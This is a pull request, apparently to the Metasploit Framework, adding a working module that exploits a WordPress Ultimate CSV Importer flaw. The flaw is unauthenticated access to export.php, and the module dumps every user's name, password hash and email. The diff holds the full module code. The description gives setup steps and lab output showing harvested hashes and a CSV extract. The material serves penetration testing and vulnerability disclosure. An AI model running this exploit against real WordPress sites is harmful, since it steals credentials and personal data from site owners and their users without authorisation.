### PR TITLE
Add WordPress Ultimate CSV Importer user extract module

### DIFF
--- a/lib/msf/http/wordpress/version.rb
+++ b/lib/msf/http/wordpress/version.rb
@@ -93,7 +93,6 @@ module Msf::HTTP::Wordpress::Version
       'method' => 'GET'
     )
     
-    # no readme.txt present
     if res.nil? || res.code != 200
       readme_url = normalize_uri(target_uri.path, wp_content_dir, folder, name, 'Readme.txt')
       res = send_request_cgi(

--- a/lib/msf/http/wordpress/version.rb
+++ b/lib/msf/http/wordpress/version.rb
@@ -92,8 +92,18 @@ module Msf::HTTP::Wordpress::Version
       'uri'    => readme_url,
       'method' => 'GET'
     )
+    
     # no readme.txt present
-    return Msf::Exploit::CheckCode::Unknown if res.nil? || res.code != 200
+    if res.nil? || res.code != 200
+      readme_url = normalize_uri(target_uri.path, wp_content_dir, folder, name, 'Readme.txt')
+      res = send_request_cgi(
+        'uri'    => readme_url,
+        'method' => 'GET'
+      )
+
+      # no Readme.txt present
+      return Msf::Exploit::CheckCode::Unknown if res.nil? || res.code != 200
+    end
 
     # try to extract version from readme
     # Example line:

--- a/modules/auxiliary/gather/wp_ultimate_csv_importer_user_extract.rb
+++ b/modules/auxiliary/gather/wp_ultimate_csv_importer_user_extract.rb
@@ -34,15 +34,6 @@ class Metasploit3 < Msf::Auxiliary
         ],
       'DisclosureDate'  => 'Feb 02 2015'
     ))
-
-    register_options(
-      [
-        OptString.new('EXPORT_TO', [false, 'The file to save the CSV extract to'])
-      ], self.class)
-  end
-
-  def export_to
-    datastore['EXPORT_TO']
   end
 
   def plugin_url
@@ -114,14 +105,6 @@ class Metasploit3 < Msf::Auxiliary
       end
     end
 
-    if export_to.to_s.strip.length > 0
-      begin
-        print_status("#{peer} - Exporting CSV to #{export_to}...")
-        File.open(export_to, 'wb') { |f| f.write(res.body) }
-        print_good("#{peer} - CSV exported")
-      rescue
-        print_error("#{peer} - Failed to export CSV")
-      end
-    end
+    store_loot('wordpress.users.export', 'csv', datastore['RHOST'], res.body, 'users_export.csv', 'WordPress User Table Extract')
   end
 end

--- a/modules/auxiliary/gather/wp_ultimate_csv_importer_user_extract.rb
+++ b/modules/auxiliary/gather/wp_ultimate_csv_importer_user_extract.rb
@@ -105,6 +105,7 @@ class Metasploit3 < Msf::Auxiliary
       end
     end
 
-    store_loot('wordpress.users.export', 'csv', datastore['RHOST'], res.body, 'users_export.csv', 'WordPress User Table Extract')
+    store_path = store_loot('wordpress.users.export', 'csv', datastore['RHOST'], res.body, 'users_export.csv', 'WordPress User Table Extract')
+    print_good("#{peer} - CSV saved to #{store_path}")
   end
 end

--- a/modules/auxiliary/gather/wp_ultimate_csv_importer_user_extract.rb
+++ b/modules/auxiliary/gather/wp_ultimate_csv_importer_user_extract.rb
@@ -1,0 +1,127 @@
+##
+# This module requires Metasploit: http://www.metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'csv'
+
+class Metasploit3 < Msf::Auxiliary
+  include Msf::HTTP::Wordpress
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(update_info(
+      info,
+      'Name'            => 'WordPress Ultimate CSV Importer User Table Extract',
+      'Description'     => %q{Due to lack of verification of a visitor's
+                              permissions, it is possible to execute the
+                              'export.php' script included in the default
+                              installation of this plugin, and retrieve the full
+                              contents of the user table in the WordPress
+                              installation. This results in full disclosure of
+                              usernames, hashed passwords and email addresses
+                              for all users.},
+      'License'         => MSF_LICENSE,
+      'Author'          =>
+        [
+          'James Hooker',                    # Disclosure
+          'Rob Carr <rob[at]rastating.com>'  # Metasploit module
+        ],
+      'References'      =>
+        [
+          ['WPVDB', '7778']
+        ],
+      'DisclosureDate'  => 'Feb 02 2015'
+    ))
+
+    register_options(
+      [
+        OptString.new('EXPORT_TO', [false, 'The file to save the CSV extract to'])
+      ], self.class)
+  end
+
+  def export_to
+    datastore['EXPORT_TO']
+  end
+
+  def plugin_url
+    normalize_uri(wordpress_url_plugins, 'wp-ultimate-csv-importer')
+  end
+
+  def exporter_url
+    normalize_uri(plugin_url, 'modules', 'export', 'templates', 'export.php')
+  end
+
+  def check
+    check_plugin_version_from_readme('wp-ultimate-csv-importer', '3.6.7' '3.6.0')
+  end
+
+  def process_row(row)
+    if row[:user_login] && row[:user_pass]
+      print_good("#{peer} - Found credential: #{row[:user_login]}:#{row[:user_pass]}")
+
+      credential_data = {
+        origin_type: :service,
+        module_fullname: fullname,
+        private_type: :nonreplayable_hash,
+        address: ::Rex::Socket.getaddress(rhost, true),
+        port: rport,
+        protocol: 'tcp',
+        service_name: ssl ? 'https' : 'http',
+        username: row[:user_login],
+        private_data: row[:user_pass],
+        workspace_id: myworkspace_id
+      }
+
+      credential_core = create_credential(credential_data)
+      login_data = {
+        core: credential_core,
+        status: Metasploit::Model::Login::Status::UNTRIED
+      }
+      login_data.merge!(credential_data)
+      create_credential_login(login_data)
+    end
+  end
+
+  def parse_csv(body, delimiter)
+    begin
+      CSV::Converters[:blank_to_nil] = lambda do |field|
+        field && field.empty? ? nil : field
+      end
+      csv = CSV.new(body, :col_sep => delimiter, :headers => true, :header_converters => :symbol, :converters => [:all, :blank_to_nil])
+      csv.to_a.map { |row| process_row(row) }
+      return true
+    rescue
+      return false
+    end
+  end
+
+  def run
+    print_status("#{peer} - Requesting CSV extract...")
+    res = send_request_cgi(
+      'method'    => 'POST',
+      'uri'       => exporter_url,
+      'vars_post' => { 'export' => 'users' }
+    )
+    fail_with(Failure::Unreachable, 'No response from the target') if res.nil?
+    fail_with(Failure::UnexpectedReply, "Server responded with status code #{res.code}") if res.code != 200
+
+    print_status("#{peer} - Parsing response...")
+    unless parse_csv(res.body, ',')
+      unless parse_csv(res.body, ';')
+        fail_with("#{peer} - Failed to parse response, the CSV was invalid")
+      end
+    end
+
+    if export_to.to_s.strip.length > 0
+      begin
+        print_status("#{peer} - Exporting CSV to #{export_to}...")
+        File.open(export_to, 'wb') { |f| f.write(res.body) }
+        print_good("#{peer} - CSV exported")
+      rescue
+        print_error("#{peer} - Failed to export CSV")
+      end
+    end
+  end
+end


### PR DESCRIPTION
Due to lack of verification of a visitor's permissions, it is possible to execute the 'export.php' script included in the default installation of this plugin, and retrieve the full contents of the user table in the WordPress installation. This results in full disclosure of usernames, hashed passwords and email addresses for all users.
## References
- https://wpvulndb.com/vulnerabilities/7778
## Important Notes
- Although the original disclosure stated this is vulnerable up to version 3.7.4, I have put the targets as 3.6.0 - 3.6.6, as these are the only versions which are not protected by the WordPress nonce functions. If I'm correct, to bypass the nonce verification an attacker would need to have stolen a valid session, at which point this attack becomes some what void as one would have access to the admin control panel had they compromised a session.
- I have modified the readme.txt detection in `lib/msf/http/wordpress/version.rb` to try a second attempt using a capitalised file name should it fail to find "readme.txt", as it seems some developers may be using "Readme.txt" instead; possibly as a means of trying to evade automated vulnerability checking.
- You will notice it attempts to parse the CSV a second time if it fails the first, that is because between the different versions, the developer changed the CSV format they were using, in 3.6.0 you will find they used a semi-colon as the delimiter, and then later switched to a comma.
## Verification
- [ ] Download and install [WordPress](https://wordpress.org/download/)
- [ ] Download a version of the plugin between 3.6.0 and 3.6.6 from here: https://wordpress.org/plugins/wp-ultimate-csv-importer/developers/
- [ ] Extract the `wp-ultimate-csv-importer` folder into the `/wp-content/plugins/` directory inside your WordPress installation folder
- [ ] Login to your WordPress admin control panel and activate the plugin
- [ ] Load msfconsole and `use auxiliary/gather/wp_ultimate_csv_importer_user_extract`
- [ ] Set RHOST to the target's address
- [ ] If running WordPress in a subdirectory, ensure to set TARGETURI appropriately (e.g. if running in a folder called wordpress, set TARGETURI to /wordpress/)
- [ ] Optionally, set the file name to export the CSV to, if you want to store a copy of the full extract outside of the msf database
- [ ] Run the module
## Example Output

```
msf > use auxiliary/gather/wp_ultimate_csv_importer_user_extract
msf auxiliary(wp_ultimate_csv_importer_user_extract) > set RHOST 192.168.1.15
RHOST => 192.168.1.15
msf auxiliary(wp_ultimate_csv_importer_user_extract) > set TARGETURI /wordpress/
TARGETURI => /wordpress/
msf auxiliary(wp_ultimate_csv_importer_user_extract) > set EXPORT_TO /root/extract.csv
EXPORT_TO => /root/extract.csv
msf auxiliary(wp_ultimate_csv_importer_user_extract) > check

[*] 192.168.1.15:80 - Found version 3.6.6 of the plugin
[*] 192.168.1.15:80 - The target appears to be vulnerable.
msf auxiliary(wp_ultimate_csv_importer_user_extract) > run

[*] 192.168.1.15:80 - Requesting CSV extract...
[*] 192.168.1.15:80 - Parsing response...
[+] 192.168.1.15:80 - Found credential: msf:$P$BHGhPf3hdeB4H5/UbjvmZdXpP8wKJO/
[+] 192.168.1.15:80 - Found credential: root:$P$BseKx4lY7o.lB.pIsajFDkXTMPiubV.
[+] 192.168.1.15:80 - Found credential: secureguy:$P$BpVx8VqDMVewiKQOJFrTVs2qgBM3pr0
[*] 192.168.1.15:80 - Exporting CSV to /root/extract.csv...
[+] 192.168.1.15:80 - CSV exported
[*] Auxiliary module execution completed
msf auxiliary(wp_ultimate_csv_importer_user_extract) > cat /root/extract.csv
[*] exec: cat /root/extract.csv

"ID","user_login","user_pass","user_nicename","user_email","user_url","user_registered","user_activation_key","user_status","display_name","nickname","first_name","last_name","description","rich_editing","comment_shortcuts","admin_color","use_ssl","show_admin_bar_front","wp_capabilities","wp_user_level","dismissed_wp_pointers","show_welcome_panel","session_tokens","wp_dashboard_quick_press_last_post_id"
"2","msf","$P$BHGhPf3hdeB4H5/UbjvmZdXpP8wKJO/","msf","msf@localhost.com","http://msf","2015-02-15 15:32:50",,"0","msf msf","msf","msf","msf",,"true","false","fresh","0","true",,"0","wp350_media,wp360_revisions,wp360_locks,wp390_widgets",,,
"1","root","$P$BseKx4lY7o.lB.pIsajFDkXTMPiubV.","root","rob@rastating.com",,"2015-01-04 12:57:19",,"0","root","root",,,,"true","false","fresh","0","true",,"10","wp350_media,wp360_revisions,wp360_locks,wp390_widgets","1",,"3"
"3","secureguy","$P$BpVx8VqDMVewiKQOJFrTVs2qgBM3pr0","secureguy","secureguy@localhost.com",,"2015-02-15 15:33:16",,"0","secure guy","secureguy","secure","guy",,"true","false","fresh","0","true",,"0","wp350_media,wp360_revisions,wp360_locks,wp390_widgets",,,
msf auxiliary(wp_ultimate_csv_importer_user_extract) > creds
Credentials
===========

host          service        public     private                             realm  private_type
----          -------        ------     -------                             -----  ------------
192.168.1.15  80/tcp (http)  msf        $P$BHGhPf3hdeB4H5/UbjvmZdXpP8wKJO/         Nonreplayable hash
192.168.1.15  80/tcp (http)  root       $P$BseKx4lY7o.lB.pIsajFDkXTMPiubV.         Nonreplayable hash
192.168.1.15  80/tcp (http)  secureguy  $P$BpVx8VqDMVewiKQOJFrTVs2qgBM3pr0         Nonreplayable hash

msf auxiliary(wp_ultimate_csv_importer_user_extract) > 

```
